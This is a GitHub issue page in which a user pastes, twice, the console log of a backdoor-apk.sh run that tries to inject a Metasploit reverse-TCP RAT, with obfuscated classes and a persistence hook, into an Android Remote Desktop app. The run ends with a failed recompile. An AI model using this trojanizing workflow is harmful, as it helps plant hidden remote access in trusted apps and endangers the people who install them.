You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.143
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
Keep original
Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Decompiling original APK file...done.
[] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/microsoft/rdc/androidx
[+] Smali file to hook RAT payload: com/microsoft/rdc/android/RDP_AndroidApp.smali
[] Generating RAT APK file...done.
[] Decompiling RAT APK file...done.
[] Merging permissions of original and payload projects...done.
[] Injecting helpful Java classes in RAT APK file...done.
[] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/microsoft/rdc/androidx/kmawo
[+] Generated new smali class name for MainBroadcastReceiver.smali: Bcwhv
[+] Generated new smali class name for MainService.smali: Ptidi
[+] Generated new smali class name for Payload.smali: Yrxsj
[+] Generated new smali class name for StringObfuscator.smali: Geckb
[+] Generated new smali method name for StringObfuscator.obfuscate method: xtset
[+] Generated new smali method name for StringObfuscator.unobfuscate method: qrnbf
[] Copying RAT smali files to new directories in original project...done.
[] Fixing RAT smali files...done.
[] Obfuscating const-string values in RAT smali files...done.
[] Adding hook in original smali file...done.
[] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor
`
The text was updated successfully, but these errors were encountered:
`[*] Running backdoor-apk.sh v0.2.4a on 2023年 05月 16日 星期二 21:57:51 CST
[+] Android payload options:
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.143
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Decompiling original APK file...done.
[] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/microsoft/rdc/androidx
[+] Smali file to hook RAT payload: com/microsoft/rdc/android/RDP_AndroidApp.smali
[] Generating RAT APK file...done.
[] Decompiling RAT APK file...done.
[] Merging permissions of original and payload projects...done.
[] Injecting helpful Java classes in RAT APK file...done.
[] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/microsoft/rdc/androidx/kmawo
[+] Generated new smali class name for MainBroadcastReceiver.smali: Bcwhv
[+] Generated new smali class name for MainService.smali: Ptidi
[+] Generated new smali class name for Payload.smali: Yrxsj
[+] Generated new smali class name for StringObfuscator.smali: Geckb
[+] Generated new smali method name for StringObfuscator.obfuscate method: xtset
[+] Generated new smali method name for StringObfuscator.unobfuscate method: qrnbf
[] Copying RAT smali files to new directories in original project...done.
[] Fixing RAT smali files...done.
[] Obfuscating const-string values in RAT smali files...done.
[] Adding hook in original smali file...done.
[] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor
`
The text was updated successfully, but these errors were encountered: